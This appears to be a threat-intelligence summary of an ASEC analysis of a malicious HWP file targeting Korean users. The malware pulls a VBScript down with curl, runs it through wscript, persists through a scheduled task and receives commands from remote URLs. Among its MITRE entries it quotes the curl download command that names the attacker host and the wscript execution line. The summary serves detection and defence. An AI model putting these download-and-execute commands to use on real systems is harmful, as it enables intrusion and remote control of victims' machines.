Threat Research

Malicious HWP File Disguised as a Happy Birthday Message (OLE Object) – ASEC BLOG

Securonix

An ASEC analysis outlines a multi-stage malware chain beginning with a VBScript downloader fetched via curl that ultimately fetches and runs a malicious HWP document. The attackers use persistence, dynamic command delivery, and shelling out to remote scripts, with a Korean-targeting hook indicated by the HWP author and related context. #HappyBirthday #TransWallpaper #KoreanPeninsulaPeaceEducationPlatform #Datkka #GoogledocsCloudns #AhnLab

Keypoints

  • Initial delivery uses curl to download a VBScript (vbtemp) into the APPDATA folder, marking the first stage of the dropper.
  • The VBScript is executed with wscript, enabling further script execution from the downloaded components.
  • The HWP dropper creates HappyBirthday.vbs in the %temp% folder and uses a relative link inside the HWP to trigger the VBScript, requiring user interaction.
  • A TransWallpaper file is created and registered in Task Scheduler to persist and re-run the payload every 30 minutes.
  • The HWP/TransWallpaper chain fetches commands from down.php, enabling attacker-controlled actions such as executing calc or other commands.
  • HappyBirthday.vbs downloads another script from driver.googledocs.cloudns.nz/Yb/yb and executes it, expanding the payload beyond the initial drop.
  • The HWP file’s author is linked to a Korean Peninsula Peace Education Platform, indicating targeted victims with North Korea connections.

MITRE Techniques

  • [T1105] Ingress Tool Transfer – VBScript and HWP files are downloaded from remote URLs using curl to save as %APPDATA%vbtemp. “curl -H ”user-agent: chrome/103.0.5060.134 safari/537.32” hxxp://datkka.atwebpages[.]com/2vbs -o %appdata%vbtemp”
  • [T1059.005] Command and Scripting Interpreter – The vbtemp file is executed via wscript with VBScript, enabling script execution. “The vbtemp file is run through the wscript //e:vbscript //b %APPDATA%vbtemp”
  • [T1204.002] User Execution – The HWP file’s link requires user interaction to trigger execution of the nested VBScript. “When the user clicks the link, the ..AppDataLocalTempHappyBirthday (2).vbs file is executed.”
  • [T1053.005] Scheduled Task – The TransWallpaper file is registered in the task scheduler to run every 30 minutes. “The created TransWallpaper file is registered in the task scheduler, enabling the script to be executed every 30 minutes.”
  • [T1071.001] Web Protocols – The script retrieves commands and payloads from remote servers via HTTP(S) endpoints (down.php and Googledocs Cloudns). “The script file executes additional commands received from hxxp://datkka.atwebpages[.]com/down.php” and “hxxps://driver.googledocs.cloudns[.]nz/Yb/yb”

Indicators of Compromise

  • [Hash] 7c38b40ec19609f32de2a70d409c38b0 (vbs), 60d117f5cb7b0f8133967ec535c85c6a (vbs)
  • [Hash] d86d57c1d8670d510e7b7a1ad7db9fd2 (vbs), ca2917006eb29171c9e5f374e789f53a (vbs)
  • [URL] hxxp://datkka.atwebpages.com/2vbs, hxxp://datarium.epizy.com/2vbs
  • [URL] hxxp://datkka.atwebpages.com/mal, hxxp://datkka.atwebpages.com/down.php
  • [URL] hxxps://driver.googledocs.cloudns[.]nz/Yb/yb
  • [File] 1.hwp, HappyBirthday.vbs

Read more: https://asec.ahnlab.com/en/38203/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint